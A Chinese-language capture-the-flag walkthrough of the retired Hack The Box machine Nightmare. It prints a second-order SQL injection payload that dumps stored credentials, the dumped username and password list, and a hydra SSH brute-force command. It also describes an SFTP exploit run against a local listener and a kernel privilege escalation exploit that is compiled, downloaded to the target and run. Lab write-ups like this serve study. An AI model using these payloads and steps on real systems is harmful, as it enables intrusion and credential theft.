本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.66
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.66 -o ./Nightmare-autorecon
开放了两个端口,先访问80端口
就一登录界面经过测试发现存在二次注入,大概注入方式是先注册个带注入语句的用户名,密码随便输入,但是要记住,之后不断的尝试字段有多少个,有哪些字段,然后爆出字段的用户名和密码
下面是最终注入出来的用户名和密码的SQL注入语句
bmfx') union select 1,group_concat(username,0x7c,password,0x0a) from sysadmin.users#
admin|nimda
cisco|cisco123
adminstrator|Pyuhs738?183*hjO!
josh|tontochilegge
system|manager
root|HasdruBal78
decoder|HackerNumberOne!
ftpuser|@whereyougo?
sys|change_on_install
superuser|passw0rd
user|odiolafeta
具体手工注入过程参考:https://www.hackingarticles.in/hack-the-box-nightmare-walkthrough/
将上面获得的账户和密码单独放到两个文件user.txt 和pass.txt 使用hydra进行爆破
hydra -L user.txt -P pass.txt -t 64 10.10.10.66 ssh -s 2222
得到了账户和密码ftpuser/@whereyougo?
连接ssh发现登录不上,尝试连接下sftp确认可以登录看了下里面的文件,只能下载不能上传,搜索下sftp的exploit
searchsploit sftp command execution
修改exploit的代码
本地监听443端口执行exploit
翻看下目标家目录的文件夹有个文件不能进去,但是用户decoder能进去,找下属于该用户的文件
find / -group decoder 2>/dev/null
发现了二进制文件sls ,具体分析看这个:https://ironhackers.es/writeups/writeup-nightmare-hackthebox/ 下面是直接利用其缺陷跳转至shell读取了user.txt
查看权限
发现test目录针对用户decoder是存在写和执行的权限,但是没有读的权限,所以这里就是上面为啥目录能进去,但是执行ls查看不了东西的原因,查看内核版本和操作系统版本确认目标靶机存在本地提权漏洞,对应exploit链接:
https://www.exploit-db.com/exploits/43418
https://github.com/manulqwerty/CTF-Scripts-Writeups/blob/master/43418forNightmare.c
本地编译好:
gcc 43418forNightmare.c -o pwn
本地搭建简易web应用下载到目标靶机执行提权操作,注意:这里下载的提权文件放在test目录下刚好可以,而且含有执行权限
成功提权root权限
